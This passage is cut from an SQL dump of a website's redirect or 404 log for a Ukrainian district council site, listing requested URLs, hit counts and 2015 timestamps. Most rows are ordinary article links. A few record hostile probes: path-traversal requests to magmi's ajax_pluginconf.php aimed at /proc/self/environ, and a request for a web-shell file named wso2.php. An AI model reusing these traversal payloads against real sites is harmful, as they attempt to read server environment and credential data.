00:00:00',301),(13728,'http://www.malyn-rayrada.org.ua/attachments/article/26/history%20malyn%20region3.PDF','','','',1,0,'2015-05-20 15:51:54','0000-00-00 00:00:00',301),(13729,'http://malyn-rayrada.org.ua/index.php/1084-grafik-provedennya-zasidannya-postijnikh-komisij','','','',5,0,'2015-05-21 15:34:29','0000-00-00 00:00:00',301),(13730,'http://malyn-rayrada.org.ua/index.php/1084-grafik-provedennya-zasidannya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-05-21 15:34:32','0000-00-00 00:00:00',301),(13731,'http://malyn-rayrada.org.ua/index.php/713-biatlon-zhinocha-estafeta-zoloto','','','',4,0,'2015-05-21 21:12:13','0000-00-00 00:00:00',301),(13732,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37&Itemid=72&lang=uk','','','',7,0,'2015-05-22 04:17:30','0000-00-00 00:00:00',301),(13733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=75:2010-07-30-10-51-13&catid=11&Itemid=16&lang=en','','','',3,0,'2015-05-22 07:10:21','0000-00-00 00:00:00',301),(13734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&Itemid=14&lang=en','','','',8,0,'2015-05-22 14:46:48','0000-00-00 00:00:00',301),(13735,'http://www.malyn-rayrada.org.ua/index.php/578-vikonannja-dohidnoi-chastini-za-pershe-pivrichchja','','','',10,0,'2015-05-23 00:46:31','0000-00-00 00:00:00',301),(13736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46&Itemid=85&lang=uk','','','',3,0,'2015-05-23 19:14:44','0000-00-00 00:00:00',301),(13737,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=758:--15---&lang=uk&option=com_content&view=article','','','',6,0,'2015-05-23 20:50:48','0000-00-00 00:00:00',301),(13738,'http://www.malyn-rayrada.org.ua/index.php/437-malinchani-budte-oberezhnimi-pid-chas-moroziv-i?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:16:52','0000-00-00 00:00:00',301),(13739,'http://www.malyn-rayrada.org.ua/index.php/438-uvaga-upravlinnja-pfu-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:17:01','0000-00-00 00:00:00',301),(13740,'http://www.malyn-rayrada.org.ua/index.php/77-sklad-novogo-kabinetu-ministriv-ukraini?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:17:16','0000-00-00 00:00:00',301),(13741,'http://www.malyn-rayrada.org.ua/index.php/78-narada-shhodo-nagalnih-pitan-rajonu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:17:39','0000-00-00 00:00:00',301),(13742,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/757-informacija-malinivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:41:22','0000-00-00 00:00:00',301),(13743,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/787-informue-gorinska-silska-rada?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:41:51','0000-00-00 00:00:00',301),(13744,'http://www.malyn-rayrada.org.ua/index.php/212-do-vidoma-vodiiv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:42:10','0000-00-00 00:00:00',301),(13745,'http://www.malyn-rayrada.org.ua/index.php/23-vesna-prijde-lishe-u-20-chislah-kvitnja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:42:22','0000-00-00 00:00:00',301),(13746,'http://www.malyn-rayrada.org.ua/index.php/253-pro-sklikannja-15-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:42:41','0000-00-00 00:00:00',301),(13747,'http://www.malyn-rayrada.org.ua/index.php/255-vidbulas-14-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:42:48','0000-00-00 00:00:00',301),(13748,'http://www.malyn-rayrada.org.ua/index.php/256-upravlinnja-pfu-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:42:57','0000-00-00 00:00:00',301),(13749,'http://www.malyn-rayrada.org.ua/index.php/257-do-vidoma-vlasnikiv-avto?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:43:05','0000-00-00 00:00:00',301),(13750,'http://www.malyn-rayrada.org.ua/index.php/325-ukrainci-perevedut-strilki-godinnika-na-godinu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-05-24 11:43:40','0000-00-00 00:00:00',301),(13751,'http://www.malyn-rayrada.org.ua/index.php/467-mikola-dushko-problem-z-reestracieju-zemli-bude?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 11:46:10','0000-00-00 00:00:00',301),(13752,'http://www.malyn-rayrada.org.ua/index.php/510-vidomosti-zaznacheni-v-deklaracii-pro-majno-dohodi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:46:34','0000-00-00 00:00:00',301),(13753,'http://www.malyn-rayrada.org.ua/index.php/520-vikonannja-dohidnoi-chastini-za-pershij-kvartal?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 11:46:41','0000-00-00 00:00:00',301),(13754,'http://malyn-rayrada.org.ua/index.php/200-rozklad-teletransljacij-futbolnih-matchiv-evro','','','',2,0,'2015-05-24 19:22:31','0000-00-00 00:00:00',301),(13755,'http://malyn-rayrada.org.ua/index.php/200-rozklad-teletransljacij-futbolnih-matchiv-evro?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:22:46','0000-00-00 00:00:00',301),(13756,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/746-informacija-granitnenskoi-selishhnoi-radi','','','',3,0,'2015-05-24 19:24:36','0000-00-00 00:00:00',301),(13757,'http://malyn-rayrada.org.ua/index.php/290-sklad-zbirnoi-ukraini','','','',2,0,'2015-05-24 19:24:44','0000-00-00 00:00:00',301),(13758,'http://malyn-rayrada.org.ua/index.php/291-upravlinnja-statistiki-u-m-malini-informue','','','',2,0,'2015-05-24 19:24:46','0000-00-00 00:00:00',301),(13759,'http://malyn-rayrada.org.ua/index.php/300-borgi-potribno-splachuvati','','','',2,0,'2015-05-24 19:24:49','0000-00-00 00:00:00',301),(13760,'http://malyn-rayrada.org.ua/index.php/312-pro-nagorodzhennja-vidznakoju-prezidenta-ukraini','','','',4,0,'2015-05-24 19:24:51','0000-00-00 00:00:00',301),(13761,'http://malyn-rayrada.org.ua/index.php/312-pro-nagorodzhennja-vidznakoju-prezidenta-ukraini?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:24:54','0000-00-00 00:00:00',301),(13762,'http://malyn-rayrada.org.ua/index.php/313-ispanija-chempion-evropi-z-futbolu','','','',5,0,'2015-05-24 19:24:57','0000-00-00 00:00:00',301),(13763,'http://malyn-rayrada.org.ua/index.php/326-pro-sklikannja-14-sesii-rajonnoi-radi-6-sklikannja','','','',4,0,'2015-05-24 19:24:59','0000-00-00 00:00:00',301),(13764,'http://malyn-rayrada.org.ua/index.php/326-pro-sklikannja-14-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:25:02','0000-00-00 00:00:00',301),(13765,'http://malyn-rayrada.org.ua/index.php/405-obgovoreno-pitannja-zabezpechennja-zhiteliv','','','',2,0,'2015-05-24 19:25:05','0000-00-00 00:00:00',301),(13766,'http://malyn-rayrada.org.ua/index.php/409-ocinka-rezultativ-dijalnosti-rajonnih-derzhavnih','','','',2,0,'2015-05-24 19:25:07','0000-00-00 00:00:00',301),(13767,'http://malyn-rayrada.org.ua/index.php/409-ocinka-rezultativ-dijalnosti-rajonnih-derzhavnih?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:25:10','0000-00-00 00:00:00',301),(13768,'http://malyn-rayrada.org.ua/index.php/411-reforma-z-jakoju-ukraina-zapiznjuetsja-na-20-rokiv','','','',2,0,'2015-05-24 19:25:16','0000-00-00 00:00:00',301),(13769,'http://malyn-rayrada.org.ua/index.php/438-uvaga-upravlinnja-pfu-v-malinskomu-rajoni-informue','','','',5,0,'2015-05-24 19:25:19','0000-00-00 00:00:00',301),(13770,'http://malyn-rayrada.org.ua/index.php/478-do-vidoma-deputativ-rajonnoi-radi','','','',4,0,'2015-05-24 19:25:21','0000-00-00 00:00:00',301),(13771,'http://malyn-rayrada.org.ua/index.php/77-sklad-novogo-kabinetu-ministriv-ukraini','','','',2,0,'2015-05-24 19:25:24','0000-00-00 00:00:00',301),(13772,'http://malyn-rayrada.org.ua/index.php/78-narada-shhodo-nagalnih-pitan-rajonu','','','',2,0,'2015-05-24 19:25:59','0000-00-00 00:00:00',301),(13773,'http://malyn-rayrada.org.ua/index.php/851-jak-otrimati-kompensaciju-na-oplatu-komunalnih','','','',4,0,'2015-05-24 19:26:03','0000-00-00 00:00:00',301),(13774,'http://www.malyn-rayrada.org.ua/index.php/200-rozklad-teletransljacij-futbolnih-matchiv-evro?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:28:17','0000-00-00 00:00:00',301),(13775,'http://www.malyn-rayrada.org.ua/index.php/290-sklad-zbirnoi-ukraini?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:28:50','0000-00-00 00:00:00',301),(13776,'http://www.malyn-rayrada.org.ua/index.php/291-upravlinnja-statistiki-u-m-malini-informue','','','',73,0,'2015-05-24 19:28:52','0000-00-00 00:00:00',301),(13777,'http://www.malyn-rayrada.org.ua/index.php/291-upravlinnja-statistiki-u-m-malini-informue?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:28:55','0000-00-00 00:00:00',301),(13778,'http://www.malyn-rayrada.org.ua/index.php/294-deputati-zaboronili-kuriti-u-gromadskih-miscjah?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:29:00','0000-00-00 00:00:00',301),(13779,'http://www.malyn-rayrada.org.ua/index.php/311-zaversheno-pidgotovku-do-provedennja-chergovoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 19:29:36','0000-00-00 00:00:00',301),(13780,'http://www.malyn-rayrada.org.ua/index.php/312-pro-nagorodzhennja-vidznakoju-prezidenta-ukraini?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 19:30:06','0000-00-00 00:00:00',301),(13781,'http://www.malyn-rayrada.org.ua/index.php/313-ispanija-chempion-evropi-z-futbolu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-24 19:31:21','0000-00-00 00:00:00',301),(13782,'http://www.malyn-rayrada.org.ua/index.php/326-pro-sklikannja-14-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 19:32:05','0000-00-00 00:00:00',301),(13783,'http://www.malyn-rayrada.org.ua/index.php/327-zaversheno-pidgotovku-do-chergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-24 19:32:10','0000-00-00 00:00:00',301),(13784,'http://www.malyn-rayrada.org.ua/index.php/512-ukrainci-z-nedili-budut-spati-na-godinu-menshe?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-05-24 19:32:38','0000-00-00 00:00:00',301),(13785,'http://www.malyn-rayrada.org.ua/index.php/75-vitaemo-iz-svjatom-8-bereznja','','','',4,0,'2015-05-24 19:33:27','0000-00-00 00:00:00',301),(13786,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=480:2011-11-28-10-11-58&lang=ru&option=com_content&view=article','','','',4,0,'2015-05-24 19:34:55','0000-00-00 00:00:00',301),(13787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&itemid=78&lang=uk','','','',1,0,'2015-05-24 20:22:44','0000-00-00 00:00:00',301),(13788,'http://www.malyn-rayrada.org.ua/index.php?option=com_community','','','',2,0,'2015-05-25 17:49:46','0000-00-00 00:00:00',301),(13789,'http://malyn-rayrada.org.ua/index.php/550-ukraina-vidznachae-den-konstitucii','','','',8,0,'2015-05-25 19:21:26','0000-00-00 00:00:00',301),(13790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-05-25 23:41:55','0000-00-00 00:00:00',301),(13791,'http://www.malyn-rayrada.org.ua/xmlrpc.php?rsd','','','',3,0,'2015-05-26 00:44:57','0000-00-00 00:00:00',301),(13792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=203:2010-12-15-14-10-45&catid=29:--15122010-&Itemid=60&lang=ru','','','',18,0,'2015-05-26 10:43:10','0000-00-00 00:00:00',301),(13793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-------2011-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-05-26 10:44:53','0000-00-00 00:00:00',301),(13794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=327:2011-05-20-16-20-26&catid=33&Itemid=66&lang=uk','','','',3,0,'2015-05-26 13:56:54','0000-00-00 00:00:00',301),(13795,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=325:2011-05-20-16-14-21&catid=33:-20052011&Itemid=66&lang=uk','','','',3,0,'2015-05-27 00:36:36','0000-00-00 00:00:00',301),(13796,'http://www.malyn-rayrada.org.ua/index.php/500-upravlinnja-statistiki-v-m-malin-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 05:26:33','0000-00-00 00:00:00',301),(13797,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/42-informacija-dibrivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:07:43','0000-00-00 00:00:00',301),(13798,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/746-informacija-granitnenskoi-selishhnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:07:47','0000-00-00 00:00:00',301),(13799,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/750-informacija-novovorob-ivskoi-silskoi-radi','','','',8,0,'2015-05-27 08:07:50','0000-00-00 00:00:00',301),(13800,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/754-informacija-slobidskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:07:55','0000-00-00 00:00:00',301),(13801,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/755-informacija-morozivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:07:59','0000-00-00 00:00:00',301),(13802,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/758-informacija-josipivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:08:11','0000-00-00 00:00:00',301),(13803,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/764-informacija-ukrainkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:08:16','0000-00-00 00:00:00',301),(13804,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/765-informacija-vishivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:08:20','0000-00-00 00:00:00',301),(13805,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/778-informacija-st-vorob-ivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:08:29','0000-00-00 00:00:00',301),(13806,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/779-informacija-ustinivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:08:37','0000-00-00 00:00:00',301),(13807,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/792-informacija-lukivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:08:53','0000-00-00 00:00:00',301),(13808,'http://www.malyn-rayrada.org.ua/index.php/373-dani-pro-vikonannja-dohidnoi-chastini-za-9?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:10:57','0000-00-00 00:00:00',301),(13809,'http://www.malyn-rayrada.org.ua/index.php/389-shhodo-rozderzhavlennja-drukovanih-zasobiv-masovoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:11:28','0000-00-00 00:00:00',301),(13810,'http://www.malyn-rayrada.org.ua/index.php/411-reforma-z-jakoju-ukraina-zapiznjuetsja-na-20-rokiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:11:51','0000-00-00 00:00:00',301),(13811,'http://www.malyn-rayrada.org.ua/index.php/478-do-vidoma-deputativ-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:13:15','0000-00-00 00:00:00',301),(13812,'http://www.malyn-rayrada.org.ua/index.php/480-pro-sklikannja-19-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:13:33','0000-00-00 00:00:00',301),(13813,'http://www.malyn-rayrada.org.ua/index.php/482-pro-nadannja-dozvolu-na-rozroblennja-proektu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-27 08:13:35','0000-00-00 00:00:00',301),(13814,'http://www.malyn-rayrada.org.ua/index.php/484-do-vidoma-vodiiv-neobhidno-zaminiti-vodijski-prava?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:13:42','0000-00-00 00:00:00',301),(13815,'http://www.malyn-rayrada.org.ua/index.php/498-vidbulas-18-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:13:44','0000-00-00 00:00:00',301),(13816,'http://www.malyn-rayrada.org.ua/index.php/526-do-vidoma-vipusknikiv-shkil-opublikovanij-rejting?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-05-27 08:14:15','0000-00-00 00:00:00',301),(13817,'http://www.malyn-rayrada.org.ua/index.php/528-ocinka-rezultativ-dijalnosti-rajderzhadministracij?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:14:23','0000-00-00 00:00:00',301),(13818,'http://www.malyn-rayrada.org.ua/index.php/529-propozicii-shhodo-zmini-sistemi-miscevih-viboriv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-27 08:14:30','0000-00-00 00:00:00',301),(13819,'http://www.malyn-rayrada.org.ua/index.php/800-prokuratura-malinskogo-rajonu-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:15:23','0000-00-00 00:00:00',301),(13820,'http://www.malyn-rayrada.org.ua/index.php/809-upravlinnja-finansiv-rajderzhadministracii?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:15:40','0000-00-00 00:00:00',301),(13821,'http://www.malyn-rayrada.org.ua/index.php/812-shhodo-oplati-elektroenergii?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:15:50','0000-00-00 00:00:00',301),(13822,'http://www.malyn-rayrada.org.ua/index.php/817-kolektiv-rajonnoi-radi-priednuetsja-do-vitan?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-27 08:16:07','0000-00-00 00:00:00',301),(13823,'http://www.malyn-rayrada.org.ua/wso2.php','','','',2,0,'2015-05-27 18:36:59','0000-00-00 00:00:00',301),(13824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1008:2013-05-20-07-02-57&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-05-28 07:46:03','0000-00-00 00:00:00',301),(13825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:--24----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-05-28 12:08:37','0000-00-00 00:00:00',301),(13826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=550:2012-01-26-12-39-51&catid=39&Itemid=76&lang=ru','','','',1,0,'2015-05-28 12:45:29','0000-00-00 00:00:00',301),(13827,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15&amp;sa=U&amp;ei=1A5nVa77H8SegwTTv4LwDA&amp;ved=0COUDEBYwUTjIAQ&amp;usg=AFQjCNG5Q4ujo8y6AG0AwYyiicjm9osWdA/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../..','','','',1,0,'2015-05-28 13:00:26','0000-00-00 00:00:00',301),(13828,'http://www.malyn-rayrada.org.ua/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../proc/self/environ&plugintype=utilities&pluginclass=CustomSQLUtility','','','',1,0,'2015-05-28 13:00:26','0000-00-00 00:00:00',301),(13829,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../proc/self/environ&plugintype=utilities&pluginclass=CustomSQLUtility','','','',1,0,'2015-05-28 13:00:28','0000-00-00 00:00:00',301),(13830,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15&amp;sa=U&amp;ei=1Q5nVZiAFYHxggSXhoHgCw&amp;ved=0CMUBEBYwHzj6AQ&amp;usg=AFQjCNEGZ30seRrdyJxse2xCuETEHUEZhQ/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../..','','','',1,0,'2015-05-28 13:01:14','0000-00-00 00:00:00',301),(13831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-05-28 13:05:33','0000-00-00 00:00:00',301),(13832,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=528:2012-01-05-18-49-59&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-05-28 14:22:10','0000-00-00 00:00:00',301),(13833,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/750-informacija-novovorob-ivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 08:32:56','0000-00-00 00:00:00',301),(13834,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/756-informacija-ivanivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 08:33:10','0000-00-00 00:00:00',301),(13835,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/777-informacija-pirizhkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 08:33:15','0000-00-00 00:00:00',301),(13836,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/780-informacija-shevchenkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-29 08:33:20','0000-00-00 00:00:00',301),(13837,'http://www.malyn-rayrada.org.ua/index.php/442-vitaemo-z-novim-2013-rokom-ta-rizdvom-hristovim?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-29 08:34:03','0000-00-00 00:00:00',301),(13838,'http://www.malyn-rayrada.org.ua/index.php/448-v-s-zhuravskij-budu-perekonuvati-svoih-koleg?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 08:34:09','0000-00-00 00:00:00',301),(13839,'http://www.malyn-rayrada.org.ua/index.php/527-taka-pogoda-prognozuetsja-do-kincja-tizhnja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-05-29 08:34:28','0000-00-00 00:00:00',301),(13840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&Itemid=14&lang=ru','','','',1,0,'2015-05-29 10:34:29','0000-00-00 00:00:00',301),(13841,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/746-informacija-granitnenskoi-selishhnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:21:40','0000-00-00 00:00:00',301),(13842,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/764-informacija-ukrainkivskoi-silskoi-radi','','','',1,0,'2015-05-29 18:21:47','0000-00-00 00:00:00',301),(13843,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/765-informacija-vishivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:21:51','0000-00-00 00:00:00',301),(13844,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/777-informacija-pirizhkivskoi-silskoi-radi','','','',1,0,'2015-05-29 18:21:58','0000-00-00 00:00:00',301),(13845,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/777-informacija-pirizhkivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:22:22','0000-00-00 00:00:00',301),(13846,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/778-informacija-st-vorob-ivskoi-silskoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:22:32','0000-00-00 00:00:00',301),(13847,'http://malyn-rayrada.org.ua/index.php/290-sklad-zbirnoi-ukraini?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:23:05','0000-00-00 00:00:00',301),(13848,'http://malyn-rayrada.org.ua/index.php/291-upravlinnja-statistiki-u-m-malini-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:23:52','0000-00-00 00:00:00',301),(13849,'http://malyn-rayrada.org.ua/index.php/300-borgi-potribno-splachuvati?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:24:11','0000-00-00 00:00:00',301),(13850,'http://malyn-rayrada.org.ua/index.php/405-obgovoreno-pitannja-zabezpechennja-zhiteliv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:25:30','0000-00-00 00:00:00',301),(13851,'http://malyn-rayrada.org.ua/index.php/437-malinchani-budte-oberezhnimi-pid-chas-moroziv-i?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:25:48','0000-00-00 00:00:00',301),(13852,'http://malyn-rayrada.org.ua/index.php/438-uvaga-upravlinnja-pfu-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:25:54','0000-00-00 00:00:00',301),(13853,'http://malyn-rayrada.org.ua/index.php/478-do-vidoma-deputativ-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:26:16','0000-00-00 00:00:00',301),(13854,'http://malyn-rayrada.org.ua/index.php/480-pro-sklikannja-19-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:26:23','0000-00-00 00:00:00',301),(13855,'http://malyn-rayrada.org.ua/index.php/500-upravlinnja-statistiki-v-m-malin-informue','','','',1,0,'2015-05-29 18:26:32','0000-00-00 00:00:00',301),(13856,'http://malyn-rayrada.org.ua/index.php/77-sklad-novogo-kabinetu-ministriv-ukraini?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:26:38','0000-00-00 00:00:00',301),(13857,'http://malyn-rayrada.org.ua/index.php/78-narada-shhodo-nagalnih-pitan-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:27:40','0000-00-00 00:00:00',301),(13858,'http://malyn-rayrada.org.ua/index.php/800-prokuratura-malinskogo-rajonu-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:27:43','0000-00-00 00:00:00',301),(13859,'http://malyn-rayrada.org.ua/index.php/851-jak-otrimati-kompensaciju-na-oplatu-komunalnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:27:48','0000-00-00 00:00:00',301),(13860,'http://www.malyn-rayrada.org.ua/index.php/409-ocinka-rezultativ-dijalnosti-rajonnih-derzhavnih?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-05-29 18:28:34','0000-00-00 00:00:00',301),(13861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-05-29 19:19:12','0000-00-00 00:00:00',301),(13862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-05-29 19:19:22','0000-00-00 00:00:00',301),(13863,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=301:2011-05-11-13-29-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-05-29 20:33:50','0000-00-00 00:00:00',301),(13864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=528:2012-01-05-18-49-59&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-05-30 00:05:09','0000-00-00 00:00:00',301),(13865,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=uk&Itemid=','','','',1,0,'2015-05-30 05:41:39','0000-00-00 00:00:00',301),(13866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=ru&Itemid=','','','',1,0,'2015-05-30 05:44:15','0000-00-00 